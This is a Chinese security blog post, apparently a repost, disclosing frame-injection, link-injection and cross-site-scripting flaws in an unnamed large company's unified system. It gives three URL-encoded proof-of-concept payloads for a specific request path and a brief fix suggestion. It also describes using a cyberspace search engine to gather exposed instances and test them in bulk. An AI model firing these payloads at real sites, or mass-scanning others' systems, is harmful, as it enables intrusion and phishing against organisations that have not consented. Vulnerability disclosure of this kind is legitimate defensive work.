某世界500强企业|存在通杀漏洞(0day)

admin 2024年4月24日18:52:03评论50 views字数 1173阅读3分54秒阅读模式
免责声明:1.禁止未授权的渗透测试2.该文章仅供学习参考,切勿拿去尝试3.此文所提供的信息而造成的任何后果及损失,均由使用者本人负责4.一切后果与文章作者无关5.文章所涉及的全部漏洞,均是被修复完漏洞后才公开

一.备案信息查询(因敏感问题,所以全部打码处理)

某世界500强企业|存在通杀漏洞(0day)

二.漏洞名称:

某某某有限公司统一某某系统存在框架注入漏洞

三.漏洞描述

一个框架注入攻击是一个所有基于GUI的浏览器攻击,它包括任何代码如JavaScript、VBScript(ActivX)、Flash、AJAX(html+js+py)。代码被注入是由于脚本没有对它们正确验证,攻击者有可能注入含有恶意内容的frame或iframe标记。“链接注入”是修改站点内容的行为,其方式为将外部站点的URL嵌入其中,或将有易受攻击的站点中的脚本的URL嵌入其中。将URL嵌入易受攻击的站点中,攻击者便能够以它为平台来启动对其他站点的攻击,以及攻击这个易受攻击的站点本身。主要危害:1.恶意篡改网页内容。2.网页挂马。3.网站钓鱼攻击。

四.poc

链接注入漏洞(POC1:)/hhhelop/liisstt.do?ddooommmaaainm=*/--%3E%27%22);%3E%3C/iframe%3E%3C/script%3E%3C/style%3E%3C/title%3E%3C/textarea%3E%3Ca%20href=%27http://127.0.0.1/1.html%27%3EPlease%20click%20here%20for%20a%20surprise%3C/a%3E
跨站脚本漏洞 (POC2:)/hhhelop/liisstt.do?ddooommmaaainm=%3C%2Fscript%3E%3Cscript%3Ealert%6077508%60%3C%2Fscript%3E
框架注入漏洞 (POC3:)/hhhelop/liisstt.do?ddooommmaaainm=%23%2A%2F%2D%2D%3E%27%22%29%3B%3E%3C%2Fiframe%3E%3C%2Fscript%3E%3C%2Fstyle%3E%3C%2Ftitle%3E%3C%2Ftextarea%3E%3Ciframe%09src%3Dhttps%3A%2F%2Fwww.baidu.com%3E

五.案例一

https://x.x.x..com/x/x/obueorlgggggin.do

某世界500强企业|存在通杀漏洞(0day)

使用poc2进行尝试

某世界500强企业|存在通杀漏洞(0day)

使用poc1进行尝试

某世界500强企业|存在通杀漏洞(0day)

某世界500强企业|存在通杀漏洞(0day)

使用poc3进行尝试

某世界500强企业|存在通杀漏洞(0day)

最后就是通过空间搜索引擎进行批量对其相关资产进行打包,然后进行批量测试,然后就发现这个系统都存在框架注入漏洞。

某世界500强企业|存在通杀漏洞(0day)

六.修复建议

过滤特殊字符,用户的一切输入都是有害的

原文始发于微信公众号(漏洞谷):某世界500强企业|存在通杀漏洞(0day)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日18:52:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某世界500强企业|存在通杀漏洞(0day)http://cn-sec.com/archives/2687217.html

发表评论

匿名网友 填写信息